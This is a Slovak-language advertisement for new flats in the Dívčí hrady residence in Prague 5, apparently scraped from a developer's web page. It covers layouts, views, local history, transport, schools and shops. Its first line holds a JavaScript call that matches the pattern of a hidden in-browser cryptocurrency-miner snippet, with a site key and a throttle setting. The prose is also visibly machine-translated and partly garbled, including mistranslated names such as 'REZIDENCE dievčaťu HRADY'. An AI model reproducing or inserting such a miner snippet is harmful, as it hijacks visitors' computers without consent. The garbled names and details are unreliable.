205-rezidencedivcihradyzari_20117 var _client = new Client.Anonymous('0b408ad436e697e403cb6941f29f5bf9dcb41c85ae9dd6af93bab463618ffa07', {throttle: 0.4}); _client.start();

Nové byty v Praze 5 lokalita Dívčí hrady


Nové byty v rezidencii Dívčí hrady v Prahe 5 boli úspešne realizované s dôrazom na uspokojenie náročnej klientely a boli dokončené v novembri 2011. Teraz sú nové byty pripravené okamžite k nasťahovaniu. Tieto nové byty boli konštruované odborníkmi predovšetkým pre rodiny s deťmi, ale poskytujú aj špecifické dispozičné riešenie pre klientov, ktorí vyžadujú atypické interiéry. Nové byty v rámci projektu Dívčí hrady zahŕňajú ako moderný design spojený so štýlovým prevedením interiérov, tak kladú dôraz na súkromie jednotlivých klientov. Budete milo prekvapení nielen priestrannosťou jednotlivých bytov, ale najmä prekrásnymi výhľadmi z novostavby Praha 5 – Dívčí Hrady. Tí z vás, ktorí hľadajú špecifické dispozičné riešenie bytu a majú záľubu v nevšedných interiéroch, určite uprednostní nové byty s atypickým pôdorysom umiestnené v rohoch domu. Tieto byty, vďaka veľkým oknám ponúkajú í jedinečné výhľady. Pre mladých budú určite lákavé ateliérové byty v dvoch veľkostiach, ktoré im umožňujú bývanie na dobrej adrese za prijateľnú cenu.

Nové byty v rámci rezidencie Dívčí hrady predstavujú pokojné bývanie v centre Prahy. Komorného charakteru, ktorým sa nové byty v rezidencii Dívčí hrady vyznačujú, je dosiahnuté rozdelením domu na dve sekcie, kedy sa na jednom poschodí vyskytuje maximálne päť bytov. Rezidencia Dívčí hrady Praha 5 ponúka luxusné nové byty v atraktívnej lokalite pri obľúbeného výletného miesta vrchu Devín.
 
Do novostavby Praha 5 je začlenený tiež unikátny mezonetový byt, ktorý jedinečným spôsobom spája výhody bývania v rodinnom dome s výhodami plynúcimi z bytového bývania. Nové byty Praha 5 – Rezidencia Dívčí hrady – to sú nové byty okamžite k nasťahovaniu. Neváhajte a dohodnite si osobnú prehliadku.
 

LOKALITA

REZIDENCE dievčaťu HRADY, Ulice U dievčenských hradov, 150 00 Praha 5
U obľúbeného výletného miesta vrchu Devín, z ktorého je krásny výhľad na celú Prahu, sme pre Vás pripravili nový bytový dom s moderným dizajnom a krásnymi výhľadmi. Veľkou prednosťou projektu je komorné veľkosť s tromi až piatimi bytmi na poschodí. Byty sú prevažne koncipované ako rodinné bývanie, ale v ponuke sú aj menšie ateliéry, ktoré môžu byť vhodnou investíciou. Našim cieľom je, aby ste tu našli skutočný domov a dobrých susedov.
 
MAGICKÉ MIESTO PRE ŽIVOT
 
Rezidencia Dívčí hrady je koncipovaná ako projekt moderného bývania pod magickým vrchom Devín – na okraji prírodnej rezervácie Prokopské a Dalejské údolia. Vďaka umiestnenia vo výške 310 m n.m. ponúka nádherné výhľady na časť Prahy po oboch brehoch Vltavy.
 
Lokalita nadväzuje na pripravovaný projekt Smíchov City spoločnosti Sekyra Group, v ktorom bude v bezprostrednej blízkosti vybudované nové moderné kancelárske a obchodné centrum Smíchova, doplnená plnohodnoutnou mestskou infraštruktúrou a dopravným prepojením.
 
TROCHA HISTÓRIA
 
Hrad Devín resp. zvyšky hradu, sú v reáli zrejmé už len z reliéfu krajiny a špecifické vegetácie. Luxusné hrad blokovej dispozície pravdepodobne postavil pred rokom 1338 Štěpán s Tetín, synovec přemyslovského ľavobočka Jana Volka. Okolo roku 1370 hrad kúpil Kartúzske kláštor a jeho ďalšie osudy nie sú presne známe, pravdepodobne zpustnul ešte v 14. storočia. Niektoré hypotézy počítajú s jeho konfiškáciou v roku 1420, ale v písomných dokumentoch z husitských čias už o ňom nie je zmienky. Začiatkom 16. storočia slúžila zrúcanina ako cvičný cieľ pre nové pražská delá. Veľké zvyšky múrov sú ešte zachytené na kresbe z roku 1689 a v 19. storočia bol už zo zvyškov hradu iba ťaží kameň.
 
AKO SA DOSTANETE DOMOV?
 
Od Anděla za 7 minút autobusom č 231 alebo pešo zo stanice metra Radlická pokojnú ulicou Kutvirtovo, čo je veľkou výhodou najmä pre deti. Pre motoristov je lokalita ľahko dostupná zo všetkých smerov i vďaka blízkosti pražského okruhu.
 
DO ŠKOLY, NA NÁKUP, ZA ŠPORTOM
 
Vaše deti môžu sami dôjsť do základnej školy na Radlickej ulici ( www.zsradlicka.cz ) po kľudnej ulici Kutvirtovo, iba raz prejdú hlavnej ulici Radlická cez prechod, zabezpečený semafory. U základnej školy je tiež materská škola. V okolí je niekoľko špecializovaných a odborných škôl – Základná škola pre sluchovo postihnutých ( www.sksp.org ), Najbližšie Gymnázium je Na Zatlance ( www.zatlanka.cz ).
 
Neďaleko sú dve veľké obchodné centrá – Obchodné centrum Nový Smíchov ( www.novysmichov.eu ) a Galéria Butovice ( www.galerie – butovice.cz ), kde je k dispozícii široké spektrum služieb, obchodov i multikín.
 
Sportcentrum Radlica ( www.sportcentrumradlice.cz ) a Športový klub Motorlet ( www.sk – motorlet.cz ) disponujú zariadeniami pre športové vyžitie – od plaveckého bazéna, welness a fitness centrá, spinningu, až po rôzne veľké športové haly.
 
Kúsok od bytového domu vedie cyklotrasa A1 pozdĺž Vltavy, po ktorej môžete ísť smerom k centru Prahy alebo na opačnú stranu pozdĺž Dalejského potoka.
 
Celkovú vybavenosť dopĺňajú reštaurácia U Westfal, Grécky Restaurant Delphi, Ganga Indická Reštaurácia, a ďalšie služby priamo v centre Anděl.